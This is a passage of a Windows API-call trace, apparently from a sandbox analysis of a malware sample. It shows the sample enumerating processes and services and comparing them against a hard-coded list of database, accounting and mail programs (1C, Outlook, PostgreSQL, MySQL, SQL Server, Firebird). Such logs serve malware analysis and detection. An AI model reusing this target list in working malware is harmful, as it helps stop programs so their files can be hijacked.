[0265.570] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0265.570] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0265.570] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0265.570] Process32NextW (in: hSnapshot=0x130, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.571] lstrlenW (lpString="svchost.exe") returned 11 [0265.571] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0265.571] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0265.571] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0265.571] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0265.571] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0265.571] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0265.571] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0265.571] Process32NextW (in: hSnapshot=0x130, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.571] lstrlenW (lpString="svchost.exe") returned 11 [0265.571] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0265.571] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0265.571] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0265.571] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0265.571] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0265.571] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0265.571] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0265.571] Process32NextW (in: hSnapshot=0x130, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1b0, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0265.572] lstrlenW (lpString="LogonUI.exe") returned 11 [0265.572] lstrcmpiW (lpString1="1c8.exe", lpString2="LogonUI.exe") returned -1 [0265.572] lstrcmpiW (lpString1="1cv77.exe", lpString2="LogonUI.exe") returned -1 [0265.572] lstrcmpiW (lpString1="outlook.exe", lpString2="LogonUI.exe") returned 1 [0265.572] lstrcmpiW (lpString1="postgres.exe", lpString2="LogonUI.exe") returned 1 [0265.572] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="LogonUI.exe") returned 1 [0265.572] lstrcmpiW (lpString1="mysqld.exe", lpString2="LogonUI.exe") returned 1 [0265.572] lstrcmpiW (lpString1="sqlservr.exe", lpString2="LogonUI.exe") returned 1 [0265.572] Process32NextW (in: hSnapshot=0x130, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.572] lstrlenW (lpString="svchost.exe") returned 11 [0265.572] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0265.572] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0265.572] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0265.572] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0265.572] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0265.572] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0265.572] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0265.572] Process32NextW (in: hSnapshot=0x130, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.573] lstrlenW (lpString="svchost.exe") returned 11 [0265.573] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0265.573] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0265.573] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0265.573] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0265.573] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0265.573] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0265.573] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0265.573] Process32NextW (in: hSnapshot=0x130, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0265.573] lstrlenW (lpString="audiodg.exe") returned 11 [0265.573] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0265.573] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0265.573] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0265.573] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0265.573] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0265.573] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0265.573] lstrcmpiW (lpString1="sqlservr.exe", lpString2="audiodg.exe") returned 1 [0265.573] Process32NextW (in: hSnapshot=0x130, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.574] lstrlenW (lpString="svchost.exe") returned 11 [0265.574] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0265.574] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0265.574] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0265.574] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0265.574] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0265.574] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0265.574] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0265.574] Process32NextW (in: hSnapshot=0x130, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0265.574] lstrlenW (lpString="userinit.exe") returned 12 [0265.574] lstrcmpiW (lpString1="1c8.exe", lpString2="userinit.exe") returned -1 [0265.574] lstrcmpiW (lpString1="1cv77.exe", lpString2="userinit.exe") returned -1 [0265.574] lstrcmpiW (lpString1="outlook.exe", lpString2="userinit.exe") returned -1 [0265.574] lstrcmpiW (lpString1="postgres.exe", lpString2="userinit.exe") returned -1 [0265.574] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="userinit.exe") returned -1 [0265.574] Process32NextW (in: hSnapshot=0x130, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0265.575] lstrlenW (lpString="explorer.exe") returned 12 [0265.575] Process32NextW (in: hSnapshot=0x130, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0265.575] lstrlenW (lpString="dwm.exe") returned 7 [0265.575] Process32NextW (in: hSnapshot=0x130, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.575] lstrlenW (lpString="svchost.exe") returned 11 [0265.575] Process32NextW (in: hSnapshot=0x130, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="runonce.exe")) returned 1 [0265.576] lstrlenW (lpString="runonce.exe") returned 11 [0265.576] Process32NextW (in: hSnapshot=0x130, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0265.576] lstrlenW (lpString="ivttvf.exe") returned 10 [0265.576] Process32NextW (in: hSnapshot=0x130, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x510, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0265.576] lstrlenW (lpString="spoolsv.exe") returned 11 [0265.576] Process32NextW (in: hSnapshot=0x130, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0265.576] lstrlenW (lpString="cmd.exe") returned 7 [0265.576] Process32NextW (in: hSnapshot=0x130, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.577] lstrlenW (lpString="svchost.exe") returned 11 [0265.577] Process32NextW (in: hSnapshot=0x130, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0265.577] lstrlenW (lpString="conhost.exe") returned 11 [0265.577] Process32NextW (in: hSnapshot=0x130, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0265.577] lstrlenW (lpString="taskhost.exe") returned 12 [0265.577] Process32NextW (in: hSnapshot=0x130, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 0 [0265.577] CloseHandle (hObject=0x130) returned 1 [0265.577] Sleep (dwMilliseconds=0x1f4) [0266.215] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x619d58 [0266.759] EnumServicesStatusExW (in: hSCManager=0x619d58, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0) returned 0 [0266.768] GetLastError () returned 0xea [0266.768] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa08) returned 0x652df8 [0266.768] EnumServicesStatusExW (in: hSCManager=0x619d58, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x652df8, cbBufSize=0xa08, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x652df8, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0) returned 1 [0266.768] CloseServiceHandle (hSCObject=0x619d58) returned 1 [0266.769] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0266.769] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0266.769] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0266.769] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0266.769] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0266.769] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0266.769] lstrlenW (lpString="AudioSrv") returned 8 [0266.769] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0266.769] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0266.769] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0266.769] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0266.769] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0266.769] lstrlenW (lpString="BFE") returned 3 [0266.769] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0266.770] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0266.770] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0266.770] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0266.770] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0266.770] lstrlenW (lpString="CscService") returned 10 [0266.770] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0266.770] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0266.770] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0266.770] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0266.770] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0266.770] lstrlenW (lpString="DcomLaunch") returned 10 [0266.770] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0266.770] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0266.770] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0266.770] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0266.770] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0266.770] lstrlenW (lpString="Dhcp") returned 4 [0266.770] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0266.770] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0266.770] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0266.770] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0266.770] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0266.770] lstrlenW (lpString="Dnscache") returned 8 [0266.770] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0266.770] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0266.770] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0266.770] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0266.770] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0266.770] lstrlenW (lpString="eventlog") returned 8 [0266.770] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0266.770] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0266.770] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0266.770] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0266.771] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0266.771] lstrlenW (lpString="EventSystem") returned 11 [0266.771] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0266.771] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0266.771] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0266.771] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0266.771] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0266.771] lstrlenW (lpString="gpsvc") returned 5 [0266.771] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0266.771] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0266.771] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0266.771] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0266.771] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0266.771] lstrlenW (lpString="lmhosts") returned 7 [0266.771] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0266.771] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0266.771] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0266.771] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0266.771] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0266.771] lstrlenW (lpString="MMCSS") returned 5 [0266.771] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0266.771] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0266.771] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0266.771] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0266.771] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0266.771] lstrlenW (lpString="nsi") returned 3 [0266.771] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0266.771] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0266.771] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0266.771] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0266.771] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0266.771] lstrlenW (lpString="PlugPlay") returned 8 [0266.771] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0266.772] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0266.772] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0266.772] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0266.772] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0266.772] lstrlenW (lpString="Power") returned 5 [0266.772] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0266.772] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0266.772] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0266.772] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0266.772] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0266.772] lstrlenW (lpString="ProfSvc") returned 7 [0266.772] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0266.772] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0266.772] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0266.772] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0266.772] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0266.772] lstrlenW (lpString="RpcEptMapper") returned 12 [0266.772] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0266.772] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0266.772] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0266.772] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0266.772] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0266.772] lstrlenW (lpString="RpcSs") returned 5 [0266.772] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0266.772] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0266.772] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0266.772] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0266.772] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0266.772] lstrlenW (lpString="SamSs") returned 5 [0266.772] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0266.772] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0266.772] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0266.772] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0266.773] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0266.773] lstrlenW (lpString="Schedule") returned 8 [0266.773] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0266.773] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0266.773] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0266.773] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0266.773] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0266.773] lstrlenW (lpString="SENS") returned 4 [0266.773] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0266.773] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0266.773] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0266.773] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0266.773] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0266.773] lstrlenW (lpString="ShellHWDetection") returned 16 [0266.773] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0266.773] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0266.773] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0266.773] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0266.773] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0266.773] lstrlenW (lpString="Spooler") returned 7 [0266.773] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0266.773] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0266.773] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0266.773] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0266.773] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0266.773] lstrlenW (lpString="Themes") returned 6 [0266.773] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0266.773] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0266.773] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0266.773] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0266.773] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0266.773] lstrlenW (lpString="UxSms") returned 5 [0266.774] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0266.774] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0266.774] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0266.774] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0266.774] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0266.774] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x652df8 | out: hHeap=0x5e0000) returned 1 [0266.774] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x138 [0266.775] Process32FirstW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.775] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0266.775] lstrlenW (lpString="System") returned 6 [0266.775] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0266.775] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0266.775] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0266.776] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0266.776] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0266.776] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0266.776] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0266.776] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0266.776] lstrlenW (lpString="smss.exe") returned 8 [0266.776] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0266.776] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0266.776] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0266.776] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0266.776] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0266.776] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0266.776] lstrcmpiW 